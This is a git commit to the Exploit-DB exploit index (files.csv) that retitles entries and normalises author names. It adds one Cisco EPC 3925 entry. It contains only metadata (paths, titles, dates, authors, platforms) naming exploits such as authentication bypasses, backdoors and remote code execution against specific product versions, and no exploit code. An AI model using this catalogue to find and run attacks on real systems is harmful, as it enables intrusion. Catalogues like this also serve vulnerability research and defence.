DB: 2016-09-16
3 new exploits Avaya IP Office Phone Manager - Local Password Disclosure BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities PA168 Chipset IP Phones - Weak Session Management Exploit CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash phpMyAdmin - '/scripts/setup.php' PHP Code Injection NScan 0.9.1 - (Target) Buffer Overflow NScan 0.9.1 - 'Target' Buffer Overflow Xerox WorkCentre - Multiple Models Denial of Service Xerox WorkCentre (Multiple Models) - Denial of Service Cisco EPC 3925 - Multiple Vulnerabilities httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit) Novell eDirectory 8.8sp5 - Buffer Overflow Uebimiau Webmail 3.2.0-2.0 - Email Disclosure ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC) Integard Home and Pro 2 - Remote HTTP Buffer Overflow Multiple D-Link Router Models - Authentication Bypass D-Link Router (Multiple Models) - Authentication Bypass iSO Air Files 2.6 - Directory Traversal iOS FtpDisc 1.0 - Directory Traversal iOS SideBooks 1.0 - Directory Traversal iOS FtpDisc 1.0 - Directory Traversal iOS SideBooks 1.0 - Directory Traversal iSO Filer Lite 2.1.0 - Directory Traversal iOS iDocManager 1.0.0 - Directory Traversal iOS myDBLite 1.1.10 - Directory Traversal iSO Filer Lite 2.1.0 - Directory Traversal iOS iDocManager 1.0.0 - Directory Traversal iOS myDBLite 1.1.10 - Directory Traversal iOS Share 1.0 - Directory Traversal iOS TIOD 1.3.3 - Directory Traversal Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure Apache/mod_ssl 2.0.x - Remote Denial of Service SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation Airlive IP Cameras - Multiple Vulnerabilities Monkey CMS - Multiple Vulnerabilities NetBSD mail.local - Privilege Escalation (Metasploit) Apache Mina 2.0.13 - Remote Command Execution Apache Mina 2.0.13 - Remote Command 
Execution DeepOfix SMTP Server 3.3 - Authentication Bypass xEpan 1.0.4 - Multiple Vulnerabilities Humhub 0.10.0-rc.1 - SQL Injection Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities Humhub 0.10.0-rc.1 - SQL Injection Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness Koha 3.20.1 - Multiple SQL Injections Koha 3.20.1 - Directory Traversal Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities Koha 3.20.1 - Multiple SQL Injections Koha 3.20.1 - Directory Traversal Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities 8 TOTOLINK Router Models - Backdoor and Remote Code Execution 8 TOTOLINK Router Models - Backdoor / Remote Code Execution Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow TestLink 1.9.14 - Cross-Site Request Forgery PaKnPost Pro 1.14 - Multiple Vulnerabilities zFTP Client 20061220 - (Connection Name) Local Buffer Overflow zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access Cisco ASA 8.x - Authentication Bypass (EXTRABACON) Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN) Cisco ASA / PIX - Privilege Escalation (EPICBANANA) TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT) TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE) TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL) TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR) Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER) Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code 
Execution TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution tcPbX - (tcpbx_lang) Local File Inclusion tcPbX - 'tcpbx_lang' Local File Inclusion
This commit is contained in:
parent
f1e68e0b1d
commit
751e61a6bf
4 changed files with 1112 additions and 51 deletions
105
files.csv
105
files.csv
|
@ -661,7 +661,7 @@ id,file,description,date,author,platform,type,port
|
|||
836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
|
||||
837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
|
||||
838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos,0
|
||||
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0
|
||||
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",windows,local,0
|
||||
840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0
|
||||
841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0
|
||||
842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0
|
||||
|
@ -1743,7 +1743,7 @@ id,file,description,date,author,platform,type,port
|
|||
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
|
||||
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
|
||||
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
|
||||
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
|
||||
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",hardware,remote,0
|
||||
2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0
|
||||
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
|
||||
2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -2862,7 +2862,7 @@ id,file,description,date,author,platform,type,port
|
|||
3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
|
||||
3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
|
||||
3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
|
||||
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0
|
||||
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian _pagvac_ Pastor",hardware,remote,0
|
||||
3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
|
||||
3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
|
||||
3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0
|
||||
|
@ -6709,7 +6709,7 @@ id,file,description,date,author,platform,type,port
|
|||
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
|
||||
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
|
||||
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
|
||||
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0
|
||||
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0
|
||||
7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0
|
||||
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
|
||||
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
|
||||
|
@ -8416,7 +8416,7 @@ id,file,description,date,author,platform,type,port
|
|||
8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0
|
||||
8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
|
||||
8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
|
||||
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
|
||||
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0
|
||||
8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0
|
||||
8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0
|
||||
8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0
|
||||
|
@ -8721,7 +8721,7 @@ id,file,description,date,author,platform,type,port
|
|||
9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0
|
||||
9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
|
||||
9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
|
||||
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
|
||||
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - 'Target' Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
|
||||
9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
|
||||
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
|
||||
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
|
||||
|
@ -8981,7 +8981,8 @@ id,file,description,date,author,platform,type,port
|
|||
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
|
||||
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
|
||||
9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0
|
||||
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre - Multiple Models Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
|
||||
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
|
||||
40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
|
||||
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
|
@ -9270,7 +9271,7 @@ id,file,description,date,author,platform,type,port
|
|||
9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
|
||||
9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0
|
||||
9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source Disclosure",2009-10-21,Dr_IDE,windows,webapps,0
|
||||
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
|
||||
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote,0
|
||||
9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0
|
||||
9888,platforms/php/webapps/9888.txt,"Joomla! Component Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
|
||||
9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
|
||||
|
@ -9285,7 +9286,7 @@ id,file,description,date,author,platform,type,port
|
|||
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
|
||||
9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
|
||||
9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80
|
||||
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan, murderkey",windows,remote,80
|
||||
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80
|
||||
9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
|
||||
9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
|
||||
9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
|
||||
|
@ -10670,7 +10671,7 @@ id,file,description,date,author,platform,type,port
|
|||
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
|
||||
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
|
||||
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0
|
||||
11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0
|
||||
11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
|
||||
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
|
||||
|
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
|
|||
12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0
|
||||
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
|
||||
12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
|
||||
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
|
||||
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
|
||||
12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,php,webapps,0
|
||||
|
@ -13048,7 +13049,7 @@ id,file,description,date,author,platform,type,port
|
|||
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
|
||||
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
|
||||
14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0
|
||||
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln, Nullthreat, rick2600",win_x86,remote,80
|
||||
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80
|
||||
14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local,0
|
||||
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
|
||||
|
@ -13606,7 +13607,7 @@ id,file,description,date,author,platform,type,port
|
|||
15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
|
||||
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
|
||||
15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0
|
||||
15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
|
||||
15666,platforms/hardware/webapps/15666.txt,"D-Link Router (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
|
||||
15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
|
||||
15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0
|
||||
15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0
|
||||
|
@ -14019,7 +14020,7 @@ id,file,description,date,author,platform,type,port
|
|||
16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0
|
||||
16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,windows,dos,0
|
||||
16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0
|
||||
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
|
||||
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
|
||||
16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Persistent Cross-Site Scripting",2011-02-19,"Saif El-Sherei",php,webapps,0
|
||||
16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0
|
||||
16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0
|
||||
|
@ -14033,8 +14034,8 @@ id,file,description,date,author,platform,type,port
|
|||
16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0
|
||||
16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
|
||||
16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
|
||||
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0
|
||||
16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
|
@ -14042,11 +14043,11 @@ id,file,description,date,author,platform,type,port
|
|||
16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
|
||||
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
|
||||
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
|
||||
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
|
||||
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16232,platforms/php/webapps/16232.txt,"WordPress Plugin GigPress 2.1.10 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
|
||||
16233,platforms/php/webapps/16233.txt,"WordPress Plugin Relevanssi 2.7.2 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
|
||||
16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0
|
||||
|
@ -14081,7 +14082,7 @@ id,file,description,date,author,platform,type,port
|
|||
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
|
||||
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0
|
||||
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
|
||||
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
|
||||
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
|
||||
16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0
|
||||
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
|
||||
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0
|
||||
|
@ -18954,7 +18955,7 @@ id,file,description,date,author,platform,type,port
|
|||
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
